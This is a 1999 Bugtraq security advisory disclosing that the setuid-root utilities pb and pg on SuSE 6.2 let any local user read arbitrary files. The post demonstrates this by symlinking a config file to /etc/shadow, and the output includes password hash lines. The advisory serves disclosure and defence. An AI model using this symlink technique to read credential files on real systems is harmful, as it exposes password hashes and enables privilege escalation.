Bugtraq mailing list archives
Two SuSE 6.2 local root exploits
From: btellier () WEBLEY COM (Brock Tellier)
Date: Thu, 16 Sep 1999 19:06:24 -0500
Greetings,

/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow any user to read any file on the system as shown:

susebox:/root # ls -la /usr/bin/pb uname
-rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such file or directory
) = 41
_exit(1) = ?
susebox:/root #

---

xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file

The same scenario for /usr/bin/pg's pg.conf in your cwd.

These two programs also contain numerous buffer overflows and other insecure file i/o and should obviously lose their suid bits. They cannot operate correctly without their s-bits unless they are run by root, but no one besides root will run them anyway. These programs are not worth patching.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com